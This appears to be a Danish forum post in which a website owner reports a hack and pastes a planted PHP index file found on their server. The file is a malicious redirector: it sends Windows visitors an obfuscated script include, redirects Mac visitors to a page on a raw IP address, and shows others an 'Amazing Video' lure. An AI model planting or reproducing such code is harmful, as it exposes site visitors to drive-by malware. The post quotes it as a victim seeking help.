Min hjemmeside er blevet hacket..... Hvad gør man lige ved det?

Jeg opdager til min gru at der ligger nogle mapper på min hjemmeside som jeg ikke selv har lagt op. Jeg har ikke lige fået kigget det hele igennem, så jeg ved ikke hvilken skade filerne gør, men jeg er da ikke stolt af situationen. Det må jo betyde at der er nogen der har hacket mit password, eller hvad? Man kan vel ikke uploade noget til mit domæne uden at have mit password? Jeg har ikke lagt nogen scripts på hjemmesiden der giver mulighed for upload. Hvad gør man nu, og hvordan sikrer jeg mig mod gentagelser? I den ene folder ligger følgende index-fil:

<?
$script_fn = "qowah-1ieqch.js";
$pic_fn = "i9ezrsby8om.jpg";

if (isset($_GET['test']) && $_GET['test']==1)
{
    $a = file($script_fn);
    if (trim($a[0]) == '// KROTEG') {
        print "KROTEG";
    }
    exit();
}

function folder_rand() {
    $fold = "";
    $count_ch = rand(7, 15);
    //$alf = "abcdefghijklmnopqrstuvwxyz0123456789";
    $alf = "abcdefghijklmnopqrstuvwxyz";
    for ($i=0; $i<$count_ch; $i++) {
        $fold .= $alf[rand(0, strlen($alf)-1)];
    }

    return $fold;
}

if ($script_fn != "") {
   

    if (strpos($_SERVER['HTTP_USER_AGENT'],'Windows')) {

        $rscript = folder_rand()." ".folder_rand()."\n";
        $rscript .= '<scr'.'ipt sr'.'c="'.$script_fn.'"></scr'.'ipt>'."\n";
        $rscript .= folder_rand()." ".folder_rand()."\n";
       
    }
    elseif (strpos($_SERVER['HTTP_USER_AGENT'],'Macintosh')) {
        header("Location: http://61.235.117.83/mac.php");
    }
    else {
       
        $rscript .= "<title>Amazing Video</title>\n";
        $rscript .= folder_rand()." ".folder_rand()."\n";
        $rscript .= "<img src=".$pic_fn.">\n";
        $rscript .= folder_rand()." ".folder_rand()."\n";
   
    }       
       
   
}


print $rscript;
exit();
?>
<html>
<head>
<title>Hello</title>
</head>
<body>
hey rogazi
</body>
</html>